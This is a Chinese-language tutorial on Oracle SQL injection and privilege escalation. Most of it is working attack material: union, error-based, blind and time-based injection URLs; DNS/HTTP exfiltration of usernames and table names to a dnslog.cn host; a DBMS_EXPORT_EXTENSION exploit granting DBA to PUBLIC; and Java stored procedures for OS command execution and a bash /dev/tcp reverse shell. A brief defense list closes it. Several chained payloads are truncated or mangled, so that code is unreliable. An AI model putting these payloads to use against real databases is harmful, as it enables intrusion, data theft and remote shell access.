数据库注入提权总结(四)
字数 909 2025-08-12 11:34:11
Oracle数据库注入与提权全面指南
1. Oracle权限体系
1.1 权限分类
Oracle权限分为两大类:
- 系统权限:用户对数据库系统的操作权限
- 实体权限:用户对具体模式实体(schema)的操作权限
1.2 系统权限等级
- DBA:最高权限,可创建数据库结构
- RESOURCE:可创建实体,不能创建数据库结构
- CONNECT:仅可登录Oracle,不能创建实体或数据库结构
1.3 权限管理命令
-- Grant roles (only a user holding DBA rights can run this).
-- NOTE(review): "username1, username2..." is a placeholder list, not runnable syntax.
GRANT connect, resource, dba TO username1, username2...;
-- Revoke roles. This example strips CONNECT/RESOURCE/DBA from the built-in SYSTEM
-- account; in practice the target is whichever account turned out to be over-privileged.
REVOKE connect, resource, dba FROM system;
-- WITH ADMIN OPTION lets the grantee pass the role on to other users, so a compromised
-- user50 can spread the role further — grant it sparingly.
GRANT connect, resource TO user50 WITH ADMIN OPTION;
-- Inspect who holds what: roles per grantee, system privileges per grantee,
-- system privileges per role, and the privileges effective in the current session.
SELECT * FROM dba_role_privs;
SELECT * FROM dba_sys_privs;
SELECT * FROM role_sys_privs;
SELECT * FROM session_privs;
-- Drop a user; CASCADE also drops every object in that user's schema.
DROP USER [username] CASCADE;
2. Oracle注入技术
2.1 联合查询注入
基本步骤
- 判断列数:
?id=1 ORDER BY 3 --+
- 确定回显点:
?id=-1 UNION SELECT null,null,null FROM dual --+
?id=-1 UNION SELECT 1,'2','3' FROM dual --+
- 获取数据库信息:
-- 版本信息
?id=-1 UNION SELECT 1,(SELECT banner FROM sys.v_$version WHERE rownum=1),'3' FROM dual --+
-- 实例名
?id=-1 UNION SELECT 1,(SELECT instance_name FROM v_$instance),'3' FROM dual --+
- 获取用户名(Oracle 中没有独立的“数据库名”概念,用户即模式 schema,相当于其他数据库中的库名):
-- 第一个用户名
?id=-1 UNION SELECT 1,(SELECT username FROM all_users WHERE rownum=1),'3' FROM dual --+
-- 排除已获取用户名的查询
?id=-1 UNION SELECT 1,(SELECT username FROM all_users WHERE rownum=1 AND username NOT IN ('SYS')),'3' FROM dual --+
-- 当前用户
?id=-1 UNION SELECT 1,(SELECT user FROM dual),'3' FROM dual --+
- 获取表名:
-- 指定用户的第一个表
?id=-1 UNION SELECT 1,(SELECT table_name FROM all_tables WHERE rownum=1 AND owner='TEST'),'3' FROM dual --+
-- 指定用户的第二个表
?id=-1 UNION SELECT 1,(SELECT table_name FROM all_tables WHERE rownum=1 AND owner='TEST' AND table_name<>'NEWS'),'3' FROM dual --+
- 获取字段名:
?id=-1 UNION SELECT 1,(SELECT column_name FROM all_tab_columns WHERE owner='TEST' AND table_name='USERS' AND rownum=1),'3' FROM dual --+
?id=-1 UNION SELECT 1,(SELECT column_name FROM all_tab_columns WHERE owner='TEST' AND table_name='USERS' AND rownum=1 AND column_name<>'ID'),'3' FROM dual --+
- 获取数据:
?id=-1 UNION SELECT 1,(SELECT concat(concat(username,'~~'),password) FROM users WHERE rownum=1),null FROM dual --+
2.2 报错注入技术
常用报错函数
utl_inaddr.get_host_name():
-- 获取用户名
?id=1 AND 1=utl_inaddr.get_host_name('~'||(SELECT user FROM dual)||'')
ctxsys.drithsx.sn():
-- 获取表名
?id=1 AND 1=ctxsys.drithsx.sn(1,'~'||(SELECT table_name FROM all_tables WHERE rownum=1 AND owner='TEST')||'')
dbms_xdb_version.checkin():
-- 获取字段名
?id=1 AND (SELECT dbms_xdb_version.checkin('~'||(SELECT column_name FROM all_tab_columns WHERE owner='TEST' AND table_name='USERS' AND rownum=1)||'~') FROM dual) IS NOT NULL --+
XMLType():
-- 获取数据
?id=1 AND (SELECT upper(XMLType(chr(60)||chr(58)||(SELECT username FROM test.users WHERE rownum=1)||chr(62))) FROM dual) IS NOT NULL --+
2.3 布尔型盲注
使用函数
decode()函数:
-- 判断用户
?id=1 AND 1=(SELECT decode(user,'TEST',1,0) FROM dual) --+
-- 逐字符猜解
?id=1 AND 1=(SELECT decode(substr((SELECT user FROM dual),1,1),'a',1,0) FROM dual) --+
instr()函数:
?id=1 AND (instr((SELECT user FROM dual),'S'))=1 --+
substr()函数:
-- 猜解长度
?id=1 AND (SELECT length(user) FROM dual)=3 --+
-- ASCII爆破
?id=1 AND (SELECT ascii(substr(user,1,1))FROM dual)=65 --+
2.4 时间盲注
使用函数
dbms_pipe.receive_message():
-- 基础延时测试
?id=1 AND 1=(dbms_pipe.receive_message('RDS',5)) --+
-- 结合条件判断
?id=1 AND 7238=(CASE WHEN (ascii(substrc((SELECT nvl(cast(user AS varchar(4000)),chr(32)) FROM dual),1,1)) > 65) THEN dbms_pipe.receive_message(chr(32)||chr(106)||chr(72)||chr(73),5) ELSE 7238 END) --+
decode()与延时结合:
?id=1 AND 1=(SELECT decode(substr(user,1,1),'S',dbms_pipe.receive_message('RDS', 5),0) FROM dual) --+
2.5 DNS外带注入
-- 检测UTL_HTTP支持
?id=1 AND exists (SELECT count(*) FROM all_objects WHERE object_name='UTL_HTTP') --+
-- 获取用户名
?id=1 AND utl_http.request('http://'||(SELECT user FROM dual)||'.z9mt3s.dnslog.cn/oracle')=1--+
-- 获取表名
?id=1 AND utl_http.request('http://'||(SELECT table_name FROM all_tables WHERE rownum=1 AND owner='TEST')||'.z9mt3s.dnslog.cn/oracle')=1--+
3. 提权技术
3.1 dbms_export_extension()漏洞
影响版本:Oracle 8.1.7.4, 9.2.0.1-9.2.0.7, 10.1.0.2-10.1.0.4, 10.2.0.1-10.2.0.2, XE
-- 提升权限到DBA
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant dba to public'''';END;'';END;--','SYS',0,'1',0) FROM dual
3.2 Java命令执行
创建Java库执行命令
-- 创建Java库
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args){try{BufferedReader myReader= new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"";myReader.close();return str;} catch (Exception e){return e.toString(END;'';END;--','SYS',0,'1',0) FROM dual
-- 赋予Java权限
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(PUBLIC'SYS:java.io.FilePermission'execute'end;'''';END;'';END;--','SYS',0,'1',0) FROM dual
-- 创建函数
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function LinxRunCMD(p_cmd in varchar2) return varchar2 as language java name''''''''LinxUtil.runCMD(java.lang.String) return String'END;'';END;--','SYS',0,'1',0) FROM dual
-- 执行命令
SELECT sys.LinxRunCMD('/bin/bash -c /usr/bin/whoami') FROM dual
Java反弹Shell
import java.io.*;
import java.net.*;
// Reverse-shell helper meant to be loaded into the database JVM (see the CREATE JAVA SOURCE
// payload that follows). Note java.net.* is imported but never used.
// Defender's view: the Oracle server process spawning /bin/bash with a /dev/tcp redirection,
// or an unexpected outbound TCP connection from the DB host, is the signal to alert on.
public class shellRev {
// Entry point: prints a marker, then calls run(); every exception is swallowed, so failure is silent.
public static void main(String[] args) {
System.out.println(1);
try{run();} catch(Exception e){}
}
// Starts /bin/bash, which wires its stdin/stdout/stderr to a TCP connection to the
// hard-coded address 192.168.1.50:8080 and then execs /bin/sh.
// The Process handle is never read or waited on.
public static void run() throws Exception {
String[] aaa={"/bin/bash","-c","exec 9<> /dev/tcp/192.168.1.50/8080;exec 0<&9;exec 1>&9 2>&1;/bin/sh"};
Process p=Runtime.getRuntime().exec(aaa);
}
}
SQL注入实现:
-- 创建Java库
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace and compile java source named "shell" as import java.io.*;import java.net.*;public class shell {public static void run() throws Exception{String[] aaa={"/bin/bash","-c","exec 9<> /dev/tcp/127.0.0.1/8080;exec 0<&9;exec 1>&9 2>&1;/bin/sh"};Process p=Runtime.getRuntime().exec(aaa)END;'';END;--','SYS',0,'1',0) FROM dual
-- 赋予Java权限
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission(PUBLIC'SYS:java.net.SocketPermission'end;'''';END;'';END;--','SYS',0,'1',0) FROM dual
-- 创建函数
SELECT SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT" .PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''create or replace function reversetcp RETURN VARCHAR2 as language java name ''''''''shell.run() return String'END;'';END;--','SYS',0,'1',0) FROM dual
-- 反弹shell
SELECT sys.reversetcp FROM dual
4. 防御建议
- 最小权限原则:仅授予用户必要的最小权限,应用连接账号不应持有 DBA、RESOURCE 等高权限角色,也不应带 WITH ADMIN OPTION
- 及时安装补丁:修复已知的Oracle漏洞
- 收回危险包的执行权限:如 UTL_HTTP、UTL_INADDR、DBMS_PIPE、DBMS_JAVA、DBMS_EXPORT_EXTENSION 等,尤其要从 PUBLIC 角色收回 EXECUTE 权限,避免普通注入点即可调用
- 输入验证:对所有用户输入按白名单进行严格校验,过滤和转义只是辅助手段,不能替代参数化查询
- 使用参数化查询:避免SQL拼接
- 监控异常行为:审计 GRANT DBA、CREATE JAVA SOURCE、DBMS_JAVA.GRANT_PERMISSION 等高风险操作,以及数据库主机发起的异常出站 DNS/HTTP/TCP 连接和由数据库进程派生的 shell 进程
通过以上全面的Oracle注入与提权技术分析,安全研究人员可以更好地理解Oracle数据库的安全机制和潜在风险,从而采取有效措施保护数据库安全。